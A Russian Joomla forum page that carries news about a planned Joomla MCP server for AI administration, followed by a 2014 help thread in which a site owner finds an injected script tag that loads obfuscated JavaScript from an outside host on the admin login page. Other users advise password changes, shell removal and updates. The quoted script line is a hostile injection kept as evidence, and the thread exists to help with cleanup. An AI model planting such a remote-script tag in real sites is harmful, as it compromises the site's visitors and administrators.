Новости Joomla

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

В февральском номере Joomla Community Magazine в статье Evolving Joomla - Joomla CMS MCP Server: Opening the Door to AI-Powered Administration рассказывается о работе команды разработчиков над внедрением в ядро Joomla MCP-сервера.

Что такое MCP-сервер?
Последние годы всех захватывает бум ИИ-технологий. Появились ИИ-агенты - программы, устанавливаемые на сервер или компьютер, которые получают от вас запрос или задачу в человеческом виде и могут выполнять действия с файлами, ходить по сайтам, создавать сайты, программировать и т.д. Люди используют ИИ-агентов в самых разных ситуациях: от написания и проверки кода (даже там, где язык программирования не знаете совсем) до планирования путешествий и бронирования гостиницы.

ИИ-агенты могут использовать различные программные инструменты по протоколу Model Context Protocol (MCP). Для этого разработчик программы должен внедрить MCP в свой продукт или сервис. Так, например, ваш ИИ-агент может ходить по сайтам через браузер и собирать нужную информацию, управляя браузером через MCP-сервер. Или использовать функционал IDE PHP Storm для написания кода, сбора и отладки ошибок, использовать поиск PHP Storm по кодовой базе, а не простой текстовый поиск по файлам. MCP предоставляет набор функций для полноценного управления программным обеспечением.

В случае с Joomla, сервер MCP может предоставить администраторам следующие возможности:
- Автоматическое создание категорий, материалов и меню на основе карты сайта или PDF-файла.
- Создавайть SEO-оптимизированные заголовки и метаописания в пакетном режиме.
- Обновлять расширения на нескольких сайтах одновременно
- Создание посадочные страницы.

Важно отметить, что сервер MCP не задумывался как функция, доступная только «супер-администраторам». Цель инициативы — создать решение, которое будет простым в настройке, маломощным и доступным для широкого круга пользователей.

В процессе разработки точка входа Joomla (аналогично Site, Administrator, Api, Cli), которая будет работать с Streamable HTTP, необходимым для MCP. Аутентификация пока что предполагается на токенах, но затем планируется создание универсального OAuth-сервера для Joomla.
Фактические возможности MCP — инструменты, ресурсы и подсказки — реализованы в виде плагинов для обеспечения расширяемости. Таким образом ожидаем, что и сторонние разработчики смогут создавать MCP-плагины для внедрения поддержки своих расширений Joomla для работы с ИИ.

@joomlafeed

Вышли релизы безопасности Joomla 6.0.4 и Joomla 5.4.4

Релиз безопасности Joomla 6.0.4 и Joomla 5.4.4

Проект Joomla! рад сообщить о выходе Joomla 6.0.4 и Joomla 5.4.4. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 2098 Просмотров
*

mystique

  • Захожу иногда
  • 169
  • 4 / 0
Сайтик на Joomla 2.5. При попытке входа в админку (после ввода пароля) выскочило сообщение:

Последний запрос был отклонён, поскольку он содержит неправильный параметр безопасности (security token). Пожалуйста, обновите страницу и попробуйте еще раз.

Показалось подозрительным. Решил посмотреть код этой странички. И вот что я увидел:

Код
<body>Последний запрос был отклонён, поскольку он содержит неправильный параметр безопасности (security token). Пожалуйста, обновите страницу и попробуйте еще раз.<script src="//promo.supermegabest.com/static/js/intersection.js?219201410"></script></body>

Особо подозрительной показалась следующая строчка:
<script src="//promo.supermegabest.com/static/js/intersection.js?219201410"></script>


Что за супермегабест? Скачал этот скриптик и... Ничего в нем не понял. Прикладываю в аттаче. Не подскажете, что именно с сайтом сделали, и как теперь это починить? Визуально в работе сайта ничего странного пока не обнаруживается. Но интуиция подсказывает, что это временно. ;(

Большая просьба помочь советом! ;)
« Последнее редактирование: 23.10.2014, 10:44:13 от ELLE »
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Меня взломали, да? Посоветуйте!
« Ответ #1 : 23.10.2014, 10:35:56 »
В аттаче оббусифецированный JS. Его явно быть не должно! Можете смело приступать к чистке своего сайта!
*

mystique

  • Захожу иногда
  • 169
  • 4 / 0
Re: Меня взломали, да? Посоветуйте!
« Ответ #2 : 23.10.2014, 10:40:52 »
Спасибо! Жаль, конечно... Пароли на серваке тоже менять? Или достаточно будет только сайт из бэкапа вытащить?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Меня взломали, да? Посоветуйте!
« Ответ #3 : 23.10.2014, 10:44:46 »
Пароли надо везде менять!, Сайт из бэкапа не достаточно будет вытащить, проблему нужно устранять на корню, он же не просто так, там оказался... обновляйте используемые компоненты, проводите профилактические работы, сервак посмотрите на реверс...
*

ELLE

  • Глобальный модератор
  • 4505
  • 893 / 0
Re: Меня взломали, да? Посоветуйте!
« Ответ #4 : 23.10.2014, 10:45:22 »
Ребята, просили же - не выкладывать и не прикреплять к темам вредоносный код. Вы ведь не хотите, чтоб завтра ваш антивирус не пустил вас (и еще несколько тысяч человек) на форум
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Меня взломали, да? Посоветуйте!
« Ответ #5 : 23.10.2014, 10:46:04 »
Или достаточно будет только сайт из бэкапа вытащить?
Нужно найти и шелл, через который выполнили внедрение вируса.Обновить Joomla и все расширения
*

mystique

  • Захожу иногда
  • 169
  • 4 / 0
Re: Меня взломали, да? Посоветуйте!
« Ответ #6 : 23.10.2014, 10:50:47 »
Всем большое спасибо! Пошел чистить, лечить, материться. ;)


Elle, прошу пардону... Не подумал, что может повредить кому-то скриптик, про который явно написано, что вредительский, и что его лучше не запускать. Был виноват. Ошибку осознал. Больше так не буду.  ;(

*

ELLE

  • Глобальный модератор
  • 4505
  • 893 / 0
Re: Меня взломали, да? Посоветуйте!
« Ответ #7 : 23.10.2014, 10:56:25 »
Заливайте все вредительское на файлопомойки или к себе на сервер :).
Форум быстро индексируется, уже через 30-40минут в выдаче того же Google может появится клеймо "этот сайт может угрожать...", кому это надо из-за одного нехорошего человека, который правила раздела не прочитал
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

Ответов: 0
Просмотров: 1768
Последний ответ 29.08.2020, 00:25:24
от cntrl
Реклама (взломали сайт)

Автор Emusarce

Ответов: 15
Просмотров: 2363
Последний ответ 18.01.2019, 10:41:27
от ProtectYourSite
Кто эти люди у меня на сайте?

Автор E.Zhenya

Ответов: 12
Просмотров: 1890
Последний ответ 28.07.2018, 14:45:05
от voland
Есть сайт, легко ли его у меня взломают если захотят?

Автор RazarioAgro

Ответов: 3
Просмотров: 1858
Последний ответ 05.07.2018, 23:48:25
от ProtectYourSite
Наверное меня взломали

Автор serg450453

Ответов: 18
Просмотров: 1704
Последний ответ 22.01.2018, 10:50:39
от ProtectYourSite